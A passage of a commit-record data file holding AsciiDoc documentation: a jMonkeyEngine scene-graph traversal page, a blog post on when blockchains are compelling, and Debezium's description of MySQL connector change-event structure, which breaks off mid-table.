\n\n== See Also\n\n* <<jme3\/the_scene_graph#,The Scene Graph>>\n* <<jme3\/advanced\/spatial#,Spatial>>\n","old_contents":"= Traverse the SceneGraph\n:author: \n:revnumber: \n:revdate: 2016\/03\/17 20:48\n:keywords: spatial, node, mesh, geometry, scenegraph\n:relfileprefix: ..\/..\/\n:imagesdir: ..\/..\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\nYou can run a search across the whole scene graph and search for individual Spatials (`Nodes` and `Geometry`s) by custom criteria, such as the Spatial's name, or the Spatial's class, or the Spatial's user data, or Spatial's Controls. You do this when you want modify the found nodes (move them, call a method, etc) but you don't have a local variable for them.\n\n\n== Example Use Cases\n\n*Example 1:*\n\n. You have created a procedural scene with lots of dynamically generated elements.\n. You want to find individual Spatials under ever-changing conditions and modify their state. \n\n*Example 2:*\n\n. You created a mostly static scene in the jMonkeyEngine SDK and exported it as .j3o file. +The scene also contains interactive objects, for example a particle emitter, spatials with user data, or spatials with custom controls. \n. You load the .j3o scene using the assetManager. \n. You want to interact with one of the loaded interactive scene elements in your Java code. +For example, you want to call `emitAllParticles()` on the particle emitter. Or you want to find all NPC's Geometries with a custom CivilianControl, and call the CivilianControl method that makes them start acting their role.\n\nIn this case, you can use a SceneGraphVisitorAdapter to identify and access the Spatials in question.\n\n\n== Code Sample\n\nFor each search, you create a `com.jme3.scene.SceneGraphVisitorAdapter` that defines your search criteria and what you want to do with the found Spatials. Then you call the `depthFirstTraversal(visitor)` or `breadthFirstTraversal(visitor)` method of the Spatial (e.g. the rootNode, or better, a subnode) to start the search.\n\n[source,java]\n----\n\nSceneGraphVisitor visitor = new SceneGraphVisitor() {\n\n @Override\n public void visit(Spatial spat) {\n \/\/ search criterion can be control class:\n MyControl control = spatial.getControl(MyControl.class);\n if (control != null) {\n \/\/ you have access to any method, e.g. name.\n System.out.println(\"Instance of \" + control.getClass().getName() \n + \" found for \" + spatial.getName());\n }\n }\n\n};\n \n\/\/ Now scan the tree either depth first...\nrootNode.depthFirstTraversal(visitor);\n\/\/ ... or scan it breadth first.\nrootNode.breadthFirstTraversal(visitor);\n\n----\n\nWhich of the two methods is faster depends on how you designed the scengraph, and what tree element you are looking for. If you are searching for one single Geometry that is a \u201cleaf of the tree, and then stop searching, depth-first may be faster. If you search for a high-level grouping Node, breadth-first may be faster. \n\nThe choice of depth- vs breadth-first also influences the order in which found elements are returned (children first or parents first). If you want to modify user data that is inherited from the parent node (e.g. transformations), the order of application is important, because the side-effects add up.\n\nYou can use the SceneGraphVisitorAdapter class to scan separately for Geometry and Nodes.\n\n\n== See Also\n\n* <<jme3\/the_scene_graph#,The Scene Graph>>\n* <<jme3\/advanced\/spatial#,Spatial>>\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"be1394c0c95db6cae0f394f3d7a970d87449bff0","subject":"Update 2018-04-16-When-is-using-a-Blockchain-compelling.adoc","message":"Update 2018-04-16-When-is-using-a-Blockchain-compelling.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-04-16-When-is-using-a-Blockchain-compelling.adoc","new_file":"_posts\/2018-04-16-When-is-using-a-Blockchain-compelling.adoc","new_contents":"= When is using a Blockchain compelling\nPeter Lawrey\n:published_at: 2018-04-16\n:hp-tags: Block Chain, Use Case\n\nI was recently asked: when is using a Blockchain really needed?\n\nIMHO the main benefit is **ease of provider integration**. Blockchain allows providers to join a system with a much lower barrier to entry. If you are looking to build a network of new and innovative providers that don't have to trust each other, but instead trust the protocol, a blockchain is a compelling solution.\n\n=== When is Blockchain not compelling?\n\nFirst I feel I should debunk some reasons often stated.\n\n==== Blockchain doesn't make everything better\n\nIn many cases, when a blockchain is proposed, it is used as little more than a log of changes in a database. In some cases, a distributed ledger could be used when a centralised database isn't enough. Blockchain projects are easier to get approved these days as companies and individuals want to improve their blockchain skill sets, but this doesn't make it compelling from a technical point of view IMHO.\n\n==== Blockchain is unlikely to make things faster\n\nIn most cases you will still need a database for reporting services, so adding a blockchain is highly likely to make it more complicated and slower, not simpler and faster than a database alone. 
https:\/\/www2.deloitte.com\/nl\/nl\/pages\/financial-services\/articles\/5-blockchain-use-cases-in-financial-services.html[See this article, which mentions speeding up payments] \n\nBlockchain can make a system faster if it can replace enough of an existing system which already implements the features a blockchain offers, but in a less efficient manner.\n\n==== Blockchain doesn't address all security concerns\n\nTo compromise a cluster of nodes you can employ a https:\/\/learncryptography.com\/cryptocurrency\/51-attack[51% attack]. If you control a majority of nodes, you control the whole system. This could happen by adding or hacking enough nodes. A state level organisation could do this, potentially even with the most popular crypto currencies; however, most governments have easier\/cheaper ways of exercising policy or influence.\n\nMany cryptocurrencies are public, which is a real privacy concern when some of the bank balances are very high (or at least high to the individuals holding them).\n\nAt the time of writing, https:\/\/bitinfocharts.com\/bitcoin\/address\/3D2oetdNuZUqQHPJmcMDDHYoqkyNVsFk9r[this bitcoin address] has $1.5 bn, and this https:\/\/etherscan.io\/address\/0x281055afc982d96fab65b3a49cac8b878184cb16[ethereum address] has around $770 m, which makes them targets for hackers and organised crime. \n\nMaking this information private is likely to be highly desirable. However, it could still be obtained through a hack, though that is harder.\n\n=== When is Blockchain compelling?\n\nWhen participants trust a protocol, they don't have to trust each other as much. This makes inclusion of new participants easier and allows existing ones to be more innovative.\n\n==== Security\n\nReduced security impact comes via an https:\/\/www.forbes.com\/sites\/bernardmarr\/2017\/08\/10\/practical-examples-of-how-blockchains-are-used-in-banking-and-the-financial-services-sector\/[immutable ledger]. This means a new provider can join without all the existing providers needing to be fully comfortable with their security setup. \n\nNOTE: A high percentage of hacks involve disgruntled former employees. If you trust every node from every provider, you have to trust every person operating it.\n\n==== Innovative solutions\n\nUsing sub-chains, different providers can offer innovative solutions, without everyone else in the system needing to be comfortable with those solutions. By the time every participant is comfortable with a new solution, it's probably not that innovative\/disruptive. If every node needs to be trusted, you can't offer a solution\/transaction type unless every provider is comfortable with the risk associated with it.\n\n==== Built-in fee support\n\nAs the system controls the flow of value, it can also include settlement of fees and cut off participants as a result of exceeding some limit, e.g. if a participant, for whatever reason, starts spamming the system, this will cost them and result in them being cut off.\n\n=== Does a blockchain need to have its own currency?\n\nA blockchain offers a virtualisation of currencies. These can be backed by fiat or other digital currencies, a new currency, or both. If the system has fees to cover the cost of running the service, it needs to be in a supported currency. This could be in USD or EUR rather than a new currency; however, a cryptocurrency has the advantage that the actual cost can have a floating exchange rate with fiat currencies, e.g. 
each transaction could cost 1 TXN and the value of this can be determined by an exchange.\n\nNew currencies can have novel features, such as only being usable after a future date. You could have a 1000 USD token which is only usable after 1st Jan 2020, but can be bought now at a discount.\n\n=== Conclusion\n\nWhile I feel that many blockchain solutions could have used a database instead, there are some compelling use cases which allow multiple providers to offer innovative solutions to customers.\n\n","old_contents":"= When is using a Blockchain compelling\nPeter Lawrey\n:published_at: 2018-04-16\n:hp-tags: Block Chain, Use Case\n\nI was recently asked; when is using a Blockchain really needed?\n\nIMHO the main benefit is **ease of provider integration** Blockchain allows providers to join a system, with a much lower barrier to entry. If you are looking to build a network of new and innovative providers, which don't have to trust each other, instead they trust the protocol, a blockchain is a compelling solution.\n\n=== When is Blockchain not a compelling reason?\n\nFirst I feel I should debunk some reasons often stated\n\n==== Blockchain doesn't make everything better\n\nIn many cases when a blockchain is proposed, it is used as little more than a log of changes in a database. In some cases, a distributed ledger could be used when a centralised database isn't enough. Blockchain projects are easier to get approved these days as companies and individuals want to improve their blockchain skill sets but this doesn't make it compelling from a technical point of view IMHO.\n\n==== Blockchain is unlikely to make things faster\n\nIn most cases you will still need a database for reporting services, so adding a blockchain is highly likely to make it more complicated and slower, not simpler and faster than a database alone. https:\/\/www2.deloitte.com\/nl\/nl\/pages\/financial-services\/articles\/5-blockchain-use-cases-in-financial-services.html[To speed up a process] \n\nBlockchain can make a system faster if it can replace enough of an existing system which already implements the features a blockchain offers but in a less efficient manner.\n\n==== Blockchain doesn't address all security concerns\n\nTo compromise a cluster of nodes you can employ a https:\/\/learncryptography.com\/cryptocurrency\/51-attack[51% attack]. If you control a majority of nodes, you control the whole system. This could happen by adding or hacking enough nodes. A state level organisation could do this, potentially even with the most popular crypto currencies, however most govenments have easier\/cheaper ways of exercising policy or influence.\n\nMany cryptocurrencies are public which is a real privacy concern when some of the bank balances are very high (or at least high to the individuals holding them) \n\nAt the time of writing https:\/\/bitinfocharts.com\/bitcoin\/address\/3D2oetdNuZUqQHPJmcMDDHYoqkyNVsFk9r[This bitcoin address] has $1.5 bn, and this https:\/\/etherscan.io\/address\/0x281055afc982d96fab65b3a49cac8b878184cb16[ethereum address] has around $770 m which makes them targets for hackers and organised crime. \n\nMaking this information private is likely to be highly desirable. However it could still be obtained through a hack though that is harder.\n\n=== When is Blockchain compelling?\n\nWhen participants trust a protocol, they don't have to trust each other as much. 
This makes inclusion of new participants easier and allow existing ones to be more innovative.\n\n==== Security\n\nReduced security impacts via a https:\/\/www.forbes.com\/sites\/bernardmarr\/2017\/08\/10\/practical-examples-of-how-blockchains-are-used-in-banking-and-the-financial-services-sector\/[immutable ledger] This means a new provider can joins without all the existing providers needing to be fully comfortable with their security setup. \n\nNOTE: A high percentage of hacks involve disgruntled former employees. If you trust every node from every provider you have to trust every person operating it.\n\n==== Innovative solutions\n\nUsing sub-chains, different providers can offer innovative solutions, without every one else in the system needing to be comfortable with those solutions. By the time every participant is comfortable with a new solution, it probably not that innovative\/disruptive. If every node needs to be trusted, you can't offer a solution\/transaction type unless every provider is comfortable with the risk associated with it.\n\n==== Built in fee support\n\nAs the system controls the flow of value, it can also include settlement of fees and cut off participants as a result of exceeding some limit. e.g. if a participant, for what ever reason, starts spamming the system, this will cost them and result in them being cut off.\n\n=== Does a blockchain need to have it's own currency?\n\nA blockchain offers a virtualisation of currencies. These can be backed by fiat or another digital currencies, or a new currency or both. If the system has fees to cover the cost of running the service, it needs to be in a supported currency. This could be in USD or EUR rather a new currency, however a crypto currency has the advantage that the actual cost can have a floating exchanging rate with fiat currencies. e.g. each transaction could cost 1 TXN and the value of this can be determined by an exchange.\n\nNew currencies can have novel features such as only being usable after a future date. You could have a 1000 USD token which is only usable after 1st Jan 2020, but can be bought now at a discount.\n\n=== Conclusion\n\nWhile I feel than many blockchain soltuions could have used a database instead, there are some compelling use cases which allow multiple providers to offer innovating solutions to customers.\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"db44d48aa5995da770f4cee3130e0809da7ab8ba","subject":"DBZ-2226 Updates based on comments from Chris","message":"DBZ-2226 Updates based on comments from Chris\n","repos":"debezium\/debezium,jpechane\/debezium,debezium\/debezium,jpechane\/debezium,debezium\/debezium,jpechane\/debezium,jpechane\/debezium,debezium\/debezium","old_file":"documentation\/modules\/ROOT\/partials\/modules\/mysql-connector\/con-mysql-connector-events.adoc","new_file":"documentation\/modules\/ROOT\/partials\/modules\/mysql-connector\/con-mysql-connector-events.adoc","new_contents":"\/\/ Metadata created by nebel\n\/\/\n[id=\"mysql-connector-events_{context}\"]\n= MySQL connector events\n\nThe {prodname} MySQL connector generates a data change event for each row-level `INSERT`, `UPDATE`, and `DELETE` operation. Each event contains a key and a value. The structure of the key and the value depends on the table that was changed. \n\n{prodname} and Kafka Connect are designed around _continuous streams of event messages_. However, the structure of these events may change over time, which can be difficult for consumers to handle. 
To address this, each event contains the schema for its content or, if you are using a schema registry, a schema ID that a consumer can use to obtain the schema from the registry. This makes each event self-contained. \n\nThe following skeleton JSON shows the basic four parts of a change event. However, how you configure the Kafka Connect converter that you choose to use in your application determines the representation of these four parts in change events. A `schema` field is in a change event only when you configure the converter to produce it. Likewise, the event key and event payload are in a change event only if you configure a converter to produce them. If you use the JSON converter and you configure it to produce all four basic change event parts, change events have this structure: \n\n[source,json,index=0]\n----\n{\n \"schema\": { \/\/<1>\n ...\n },\n \"payload\": { \/\/<2>\n ...\n },\n \"schema\": { \/\/<3> \n ...\n },\n \"payload\": { \/\/<4>\n ...\n }\n}\n----\n\n.Overview of change event basic content\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The first `schema` field is part of the event key. It specifies a Kafka Connect schema that describes what is in the event key's `payload` portion. In other words, the first `schema` field describes the structure of the primary key, or the unique key if the table does not have a primary key, for the table that was changed. +\n +\nIt is possible to override the table's primary key by setting the {link-prefix}:{link-mysql-connector}#mysql-property-message-key-columns[`message.key.columns` connector configuration property]. In this case, the first schema field describes the structure of the key identified by that property.\n\n|2\n|`payload`\n|The first `payload` field is part of the event key. It has the structure described by the previous `schema` field and it contains the key for the row that was changed. \n\n|3\n|`schema`\n|The second `schema` field is part of the event value. It specifies the Kafka Connect schema that describes what is in the event value's `payload` portion. In other words, the second `schema` describes the structure of the row that was changed. Typically, this schema contains nested schemas. \n\n|4\n|`payload`\n|The second `payload` field is part of the event value. It has the structure described by the previous `schema` field and it contains the actual data for the row that was changed.\n\n|===
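\n\nAs a rough illustration of how a consumer might pull these four parts apart, here is a hedged Java sketch; it assumes the JSON converter with schemas enabled plus the Jackson library, and the `inspect` helper is this example's own invention:\n\n[source,java]\n----\nimport com.fasterxml.jackson.databind.JsonNode;\nimport com.fasterxml.jackson.databind.ObjectMapper;\n\n\/\/ Illustrative sketch: inspect the schema\/payload pairs of one change event record.\npublic class ChangeEventParts {\n    private static final ObjectMapper MAPPER = new ObjectMapper();\n\n    \/\/ key and value are the raw JSON strings of a single Kafka record\n    static void inspect(String key, String value) throws Exception {\n        JsonNode keyDoc = MAPPER.readTree(key);\n        JsonNode valueDoc = MAPPER.readTree(value);\n        \/\/ parts <1> and <2>: the event key's schema and payload\n        System.out.println(\"key schema:  \" + keyDoc.path(\"schema\").path(\"name\").asText());\n        System.out.println(\"key payload: \" + keyDoc.path(\"payload\"));\n        \/\/ parts <3> and <4>: the event value's schema and payload\n        System.out.println(\"value schema: \" + valueDoc.path(\"schema\").path(\"name\").asText());\n        System.out.println(\"row data:     \" + valueDoc.path(\"payload\"));\n    }\n}\n----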
\n\nBy default, the connector streams change event records to topics with names that are the same as the event's originating table. See {link-prefix}:{link-mysql-connector}#the-mysql-connector-and-kafka-topics_{context}[MySQL connector and Kafka topics].\n\n[WARNING]\n====\nThe MySQL connector ensures that all Kafka Connect schema names adhere to the link:http:\/\/avro.apache.org\/docs\/current\/spec.html#names[Avro schema name format]. This means that the logical server name must start with a Latin letter or an underscore, that is, a-z, A-Z, or \\_. Each remaining character in the logical server name and each character in the database and table names must be a Latin letter, a digit, or an underscore, that is, a-z, A-Z, 0-9, or \\_. If there is an invalid character, it is replaced with an underscore character.\n\nThis can lead to unexpected conflicts if the logical server name, a database name, or a table name contains invalid characters, and the only characters that distinguish names from one another are invalid and thus replaced with underscores.\n====\n\n== Change event keys\n\nA change event's key contains the schema for the changed table's key and the changed row's actual key. Both the schema and its corresponding payload contain a field for each column in the changed table's `PRIMARY KEY` (or unique constraint) at the time the connector created the event.\n\nConsider the following `customers` table, which is followed by an example of a change event key for this table. \n\n.Example table\n[source,sql]\n----\nCREATE TABLE customers (\n id INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL UNIQUE KEY\n) AUTO_INCREMENT=1001;\n----\n\n.Example change event key\nEvery change event that captures a change to the `customers` table has the same event key schema. For as long as the `customers` table has the previous definition, every change event that captures a change to the `customers` table has the following key structure. In JSON, it looks like this:\n\n[source,json,index=0]\n----\n{\n \"schema\": { <1>\n \"type\": \"struct\",\n \"name\": \"mysql-server-1.inventory.customers.Key\", <2>\n \"optional\": false, <3>\n \"fields\": [ <4>\n {\n \"field\": \"id\",\n \"type\": \"int32\",\n \"optional\": false\n }\n ]\n },\n \"payload\": { <5>\n \"id\": 1001\n }\n}\n----\n\n.Description of change event key\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The schema portion of the key specifies a Kafka Connect schema that describes what is in the key's `payload` portion. \n\n|2\n|`mysql-server-1.inventory.customers.Key`\na|Name of the schema that defines the structure of the key's payload. This schema describes the structure of the primary key for the table that was changed. Key schema names have the format _connector-name_._database-name_._table-name_.`Key`. In this example: + \n\n* `mysql-server-1` is the name of the connector that generated this event. + \n* `inventory` is the database that contains the table that was changed. +\n* `customers` is the table that was updated.\n\n|3\n|`optional`\n|Indicates whether the event key must contain a value in its `payload` field. In this example, a value in the key's payload is required. A value in the key's payload field is optional when a table does not have a primary key.\n\n|4\n|`fields` \n|Specifies each field that is expected in the `payload`, including each field's name, type, and whether it is required.\n\n|5\n|`payload`\n|Contains the key for the row for which this change event was generated. In this example, the key contains a single `id` field whose value is `1001`.\n\n|===\n\n== Change event values\n\nThe value in a change event is a bit more complicated than the key. Like the key, the value has a `schema` section and a `payload` section. The `schema` section contains the schema that describes the `Envelope` structure of the `payload` section, including its nested fields. Change events for operations that create, update, or delete data all have a value payload with an envelope structure.
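\n\nAs a rough sketch of what consuming that envelope can look like (hedged: the `summarise` helper is this example's own, continuing the Jackson-based sketch above):\n\n[source,java]\n----\n\/\/ Illustrative only: summarise the envelope of any create\/update\/delete event value.\nstatic String summarise(JsonNode valueDoc) {\n    JsonNode payload = valueDoc.path(\"payload\");\n    String op = payload.path(\"op\").asText();   \/\/ \"c\", \"u\", \"d\" or \"r\"\n    JsonNode before = payload.path(\"before\");  \/\/ null for creates\n    JsonNode after = payload.path(\"after\");    \/\/ null for deletes\n    String table = payload.path(\"source\").path(\"table\").asText();\n    return op + \" on \" + table + \": \" + before + \" -> \" + after;\n}\n----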
\n\nConsider the same sample table that was used to show an example of a change event key: \n\n[source,sql]\n----\nCREATE TABLE customers (\n id INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL UNIQUE KEY\n) AUTO_INCREMENT=1001;\n----\n\nThe value portion of a change event for a change to this table is described for each event type: \n\n* <<mysql-create-events,_create_ events>>\n* <<mysql-update-events,_update_ events>>\n* <<mysql-delete-events,_delete_ events>>\n\n[id=\"mysql-create-events\"]\n=== _create_ events\n\nThe following example shows the value portion of a change event that the connector generates for an operation that creates data in the `customers` table: \n\n[source,json,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ],\n \"optional\": true,\n \"name\": \"mysql-server-1.inventory.customers.Value\", \/\/ <2>\n \"field\": \"before\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ],\n \"optional\": true,\n \"name\": \"mysql-server-1.inventory.customers.Value\", \/\/ <2>\n \"field\": \"after\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"connector\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_sec\"\n },\n {\n \"type\": \"boolean\",\n \"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"table\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"server_id\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"gtid\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"file\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"pos\"\n },\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"row\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"thread\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"query\"\n }\n ],\n \"optional\": false,\n \"name\": \"io.product.connector.mysql.Source\", \/\/ <2>\n \"field\": \"source\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"op\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"ts_ms\"\n }\n ],\n \"optional\": false,\n \"name\": \"mysql-server-1.inventory.customers.Envelope\" \/\/ <2>\n },\n \"payload\": { \/\/ <3>\n \"op\": \"c\", \/\/ <4>\n \"ts_ms\": 1465491411815, \/\/ <5>\n \"before\": null, \/\/ <6>\n \"after\": { \/\/ 
<7>\n \"id\": 1004,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"source\": { \/\/ <8>\n \"version\": \"{debezium-version}\",\n \"connector\": \"mysql\",\n \"name\": \"mysql-server-1\",\n \"ts_sec\": 0,\n \"snapshot\": false,\n \"db\": \"inventory\",\n \"table\": \"customers\",\n \"server_id\": 0,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 154,\n \"row\": 0,\n \"thread\": 7,\n \"query\": \"INSERT INTO customers (first_name, last_name, email) VALUES ('Anne', 'Kretchmar', 'annek@noanswer.org')\"\n }\n }\n}\n----\n\n.Descriptions of _create_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The value's schema, which describes the structure of the value's payload. A change event's value schema is the same in every change event that the connector generates for a particular table. \n\n|2\n|`name`\na|In the `schema` section, each `name` field specifies the schema for a field in the value's payload. In this example: \n\n* `mysql-server-1.inventory.customers.Value` is the schema for the payload's `before` and `after` fields. This schema is specific to the `customers` table.\n\n* `io.product.connector.mysql.Source` is the schema for the payload's `source` field. This schema is specific to the MySQL connector. The connector uses it for all events that it generates. \n\n* `mysql-server-1.inventory.customers.Envelope` is the schema for the overall structure of the payload, where `mysql-server-1` is the connector name, `inventory` is the database, and `customers` is the table.\n\nifdef::community[]\nNames of schemas for `before` and `after` fields are of the form `_logicalName_._tableName_.Value`, which ensures that the schema name is unique in the database. This means that when using the {link-prefix}:{link-avro-serialization}[Avro converter], the resulting Avro schema for each table in each logical source has its own evolution and history.\nendif::community[]\n\n|3\n|`payload`\n|The value's actual data. This is the information that the change event is providing. \n\nIt may appear that the JSON representations of the events are much larger than the rows they describe. This is because the JSON representation must include the schema and the payload portions of the message.\nHowever, by using the {link-prefix}:{link-avro-serialization}[Avro converter], you can significantly decrease the size of the messages that the connector streams to Kafka topics.\n\n|4\n|`op`\na| Mandatory string that describes the type of operation that caused the connector to generate the event. In this example, `c` indicates that the operation created a row. Valid values are: \n\n* `c` = create\n* `u` = update\n* `d` = delete\n* `r` = read (applies to only snapshots)\n\n|5\n|`ts_ms`\na| Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task.\n\n|6\n|`before`\n| An optional field that specifies the state of the row before the event occurred. When the `op` field is `c` for create, as it is in this example, the `before` field is `null` since this change event is for new content. \n\n|7\n|`after`\n| An optional field that specifies the state of the row after the event occurred. In this example, the `after` field contains the values of the new row's `id`, `first_name`, `last_name`, and `email` columns.\n\n|8\n|`source`\na| Mandatory field that describes the source metadata for the event. 
\n\n[id=\"mysql-update-events\"]\n=== _update_ events\n\nThe value of a change event for an update in the sample `customers` table has the same schema as a _create_ event for that table. Likewise, the event value's payload has the same structure. However, the event value payload contains different values in an _update_ event. Here is an example of a change event value in an event that the connector generates for an update in the `customers` table: \n\n[source,json,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"id\": 1004,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"after\": { \/\/ <2>\n \"id\": 1004,\n \"first_name\": \"Anne Marie\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"mysql\",\n \"name\": \"mysql-server-1\",\n \"ts_sec\": 1465581,\n \"snapshot\": false,\n \"db\": \"inventory\",\n \"table\": \"customers\",\n \"server_id\": 223344,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 484,\n \"row\": 0,\n \"thread\": 7,\n \"query\": \"UPDATE customers SET first_name='Anne Marie' WHERE id=1004\"\n },\n \"op\": \"u\", \/\/ <4>\n \"ts_ms\": 1465581029523\n }\n}\n----\n\n.Descriptions of _update_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|An optional field that specifies the state of the row before the event occurred. In an _update_ event value, the `before` field contains a field for each table column and the value that was in that column before the database commit. In this example, the `first_name` value is `Anne`.\n\n|2\n|`after`\n| An optional field that specifies the state of the row after the event occurred. You can compare the `before` and `after` structures to determine what the update to this row was. In the example, the `first_name` value is now `Anne Marie`. \n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. The `source` field structure has the same fields as in a _create_ event, but some values are different, for example, the sample _update_ event is from a different position in the binlog. 
The source metadata includes: \n\n* {prodname} version\n* Connector name\n* binlog name where the event was recorded\n* binlog position\n* Row within the event\n* If the event was part of a snapshot\n* Name of the database and table that contain the updated row\n* ID of the MySQL thread that created the event (non-snapshot only)\n* MySQL server ID (if available)\n* Timestamp\n\nIf the {link-prefix}:{link-mysql-connector}#enable-query-log-events-for-cdc_{context}[`binlog_rows_query_log_events`] MySQL configuration option is enabled and the connector configuration `include.query` property is enabled, the `source` field also provides the `query` field, which contains the original SQL statement that caused the change event.\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. In an _update_ event value, the `op` field value is `u`, signifying that this row changed because of an update.\n\n|===\n\n[NOTE]\n====\nUpdating the columns for a row's primary\/unique key changes the value of the row's key. When a key changes, {prodname} outputs _three_ events: a `DELETE` event and a {link-prefix}:{link-mysql-connector}#mysql-tombstone-events[tombstone event] with the old key for the row, followed by an event with the new key for the row. Details are in the next section. \n====\n\n[id=\"mysql-primary-key-updates\"]\n=== Primary key updates\n\nAn `UPDATE` operation that changes a row's primary key field(s) is known as a primary key change. For a primary key change, in place of an `UPDATE` event record, the connector emits a `DELETE` event record for the old key and a `CREATE` event record for the new (updated) key. These events have the usual structure and content, and in addition, each one has a message header related to the primary key change, as the sketch after this list illustrates: \n\n* The `DELETE` event record has `__debezium.newkey` as a message header. The value of this header is the new primary key for the updated row.\n\n* The `CREATE` event record has `__debezium.oldkey` as a message header. The value of this header is the previous (old) primary key that the updated row had.
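\n\nA hedged sketch of reading those headers with the plain Kafka consumer API (an assumed dependency; the `onRecord` helper is this example's own):\n\n[source,java]\n----\nimport java.nio.charset.StandardCharsets;\nimport org.apache.kafka.clients.consumer.ConsumerRecord;\nimport org.apache.kafka.common.header.Header;\n\n\/\/ Illustrative only: spot the DELETE half of a primary key change via its header.\nstatic void onRecord(ConsumerRecord<String, String> record) {\n    Header h = record.headers().lastHeader(\"__debezium.newkey\");\n    if (h != null) {\n        System.out.println(\"key changed to \" + new String(h.value(), StandardCharsets.UTF_8));\n    }\n}\n----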
\n\n[id=\"mysql-delete-events\"]\n=== _delete_ events\n\nThe value in a _delete_ change event has the same `schema` portion as _create_ and _update_ events for the same table. The `payload` portion in a _delete_ event for the sample `customers` table looks like this: \n\n[source,json,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"id\": 1004,\n \"first_name\": \"Anne Marie\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"after\": null, \/\/ <2>\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"mysql\",\n \"name\": \"mysql-server-1\",\n \"ts_sec\": 1465581,\n \"snapshot\": false,\n \"db\": \"inventory\",\n \"table\": \"customers\",\n \"server_id\": 223344,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 805,\n \"row\": 0,\n \"thread\": 7,\n \"query\": \"DELETE FROM customers WHERE id=1004\"\n },\n \"op\": \"d\", \/\/ <4>\n \"ts_ms\": 1465581902461 \/\/ <5>\n }\n}\n----\n\n.Descriptions of _delete_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|Optional field that specifies the state of the row before the event occurred. In a _delete_ event value, the `before` field contains the values that were in the row before it was deleted with the database commit.\n\n|2\n|`after`\n| Optional field that specifies the state of the row after the event occurred. In a _delete_ event value, the `after` field is `null`, signifying that the row no longer exists.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. In a _delete_ event value, the `source` field structure is the same as for _create_ and _update_ events for the same table. Many `source` field values are also the same. In a _delete_ event value, the `ts_ms` and `pos` field values, as well as other values, might have changed. But the `source` field in a _delete_ event value 